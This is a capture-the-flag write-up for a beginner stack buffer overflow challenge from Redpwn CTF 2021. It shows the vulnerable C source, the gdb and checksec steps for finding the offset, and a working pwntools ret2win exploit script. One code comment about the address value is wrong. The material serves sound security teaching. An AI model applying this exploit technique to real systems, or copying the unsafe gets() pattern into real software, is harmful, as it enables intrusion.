## ret2generic-flag-reader 

* **CTF:** Redpwn CTF 2021
* **Category:** pwn
* **Points:** 106
* **Author(s):** b0uldrr
* **Date:** 10/07/21

---

### Challenge
```
I'll ace this board meeting with my new original challenge!
nc mc.ax 31077
```

### Downloads
* [ret2generic-flag-reader](ret2generic-flag-reader) 
* [ret2generic-flag-reader.c](ret2generic-flag-reader.c) 

---

### Solution

Standard beginner CTF BOF problem. Vulnerable `gets()` call, we need to overflow the stack to write the return address to the `super_generic_flag_reading_function_please_ret_to_me()` function which will print the flag. Here's the provided source:

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void super_generic_flag_reading_function_please_ret_to_me()
{
  char flag[0x100] = {0};
  FILE *fp = fopen("./flag.txt", "r");
  if (!fp)
  {
    puts("no flag!! contact a member of rob inc");
    exit(-1);
  }
  fgets(flag, 0xff, fp);
  puts(flag);
  fclose(fp);
}

int main(void)
{
  char comments_and_concerns[32];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...");
  puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!");
  puts("slap on some flavortext and there's no way rob will fire me now!");
  puts("this is genius!! what do you think?");

  gets(comments_and_concerns);
}
```

1. Determine architecture. 64 bit:
```
 file ret2generic-flag-reader
ret2generic-flag-reader: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c749a16c9546cfe2cab694374c7d003c2bbb52f3, for GNU/Linux 3.2.0, not stripped
```

2. Check for binary security features. No canary:
```
$ checksec ret2generic-flag-reader
[*] '/home/kali/ctf/redpwn-ctf-2021/ret2generic-flag-reader/ret2generic-flag-reader'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

3. Find address of `super_generic_flag_reading_function_please_ret_to_me()` to return to. `0x4011f6`:
```
$ objdump -d ret2generic-flag-reader | grep super_generic
00000000004011f6 <super_generic_flag_reading_function_please_ret_to_me>:
```

4. Determine overflow amount:
```
$ msf-pattern_create -l 200 > pattern.txt
$ gdb ret2generic-flag-reader
gdb-peda$ run < pattern.txt
gdb-peda$ x/wx $rsp
0x7fffffffdf48: 0x62413362
$ msf-pattern_offset -q 0x62413362
[*] Exact match at offset 40
```

5. Plug all of those details into my generic BOF script:
```py
#!/usr/bin/python3
import pwn

local = False
if local:
    conn = pwn.process('./ret2generic-flag-reader')
else:
    conn = pwn.remote('mc.ax', 31077)
    
conn.recvuntil('this is genius!! what do you think?')

buf  = b'a' * (40)                # return address overflow
buf += pwn.p64(0x4011F6)          # -1 in 64-bit signed integer format

conn.sendline(buf)
print(conn.recvall().decode())
```

Running it, we get the flag.

---

### Flag 
```
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
```
